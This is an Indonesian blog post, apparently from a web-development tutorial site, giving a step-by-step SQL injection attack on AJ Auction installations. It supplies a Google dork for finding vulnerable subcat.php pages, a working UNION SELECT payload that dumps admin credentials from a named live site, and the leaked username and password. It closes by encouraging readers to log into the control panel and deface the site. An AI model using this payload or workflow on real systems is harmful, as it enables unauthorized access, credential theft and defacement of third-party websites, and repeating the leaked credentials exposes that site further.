SQL Injection AJ Auction seluruh versi « Tutorial Belajar Website PHP MySQL ASP.Net Photoshop Coreldraw Flash Template

Radio Islami
Login

Username:

Password:

Remember me
- Lost your password?
Live Support (YM)

(Search engine optimization)
Anggie Jatrasmara

(Web Development)
Loka Dwiartara

(Video Editing + Visual Effect)
Hartono Gunawan
Web Resource

Photo Gallery
Gallery terbaru hasil karya staff ilmuwebsite.com (Yogi Wicaksono), silahkan kunjungi Gallery Foto Ilmuwebsite
Nulled Script
Segera hadir script siap pakai berbasis php dan mysql, mulai dari polling, guest book, dll, GRATIS!! karya ilmuwebsite.com

Web Design Resource
Koleksi Brush Photoshop Gratis, Vector, Icon,Template. Untuk percantik desain web, desain grafis, grafis anda

web partner, pulsa elektrik, kredit syariah
Facebook Kami
Banner Kami

<center> <a href = "http://www.ilmuwebsite.com" target="_blank"> <img src="http://unair.info/images/i-web2.jpg" border="0"></a><br> <a href="http://www.ilmuwebsite.com" target="_blank"> ilmuwebsite.com</a></center>
Partner
free website tracker

SQL Injection AJ Auction seluruh versi

Line Break

Penulis: Admin (251 Articles)

Memberikan pembelajaran kepada Anda seputar Web Development, Desain Grafis, dll, secara gratis. Berawal dari hoby sharing akan ilmu web development di tahun 2007 oleh 2 mahasiswa.
Contact:
Homepage : http://www.ilmuwebsite.com
Ingin menjadi penulis artikel di ilmuwebsite? Klik >> Daftar

SQL Injection AJ Auction seluruh versi tutorial hacking web desain grafis SQL Injection pada Aj Auction untuk seluruh versi.

Lagi-lagi bug baru di temukan, kali ini Al-k akan coba masuk
sebagai admin pada situs yang memiliki bug pada halaman subcat.php

langsung aja buka google-nya …
masukkan keyword ini inurl:/subcat.php?cate_id=

nah loh, dapet banyak bangett …
pilih aja salah satunya contoh :

http://www.estoop.it/subcat.php?cate_id=146&view=list&PHPSESSID=27c9b2b6500f2c01c09eda1978d45096

setelah cate_id= di hapus aja kemudian di ganti dengan

-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),pas

sword),2%20from%20admin/*&view=list

kira kira jadi begini

http://www.estoop.it/subcat.php?cate_id=-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,11

7,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list

nah loh passwordnya langsung dapet

turkey:adminturkeypass:daniel87

itu artinya
usernamenya admin
passwordnya daniel87

sekarang masuk ke control panelnya

http://www.estoop.it/admin
terus masukkin username dan passwordnya

jreng jreng jreng anda di bawa ke control panel …

hehehehe … deface deface …

Cari artikel lain :

SQL Injection AJ Auction seluruh versi tutorial hacking web desain grafis

Punya pertanyaan? Mari kita bahas di forum ilmuwebsite

This entry was posted on Thursday, June 11th, 2009 at 10:07 AM and is filed under Tutorial Hacking. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.

Comments are closed.

Ilmuwebsite Center

Radio Islami

Login

Live Support (YM)

Web Resource

Facebook Kami

Banner Kami

Partner

Main Menu

SQL Injection AJ Auction seluruh versi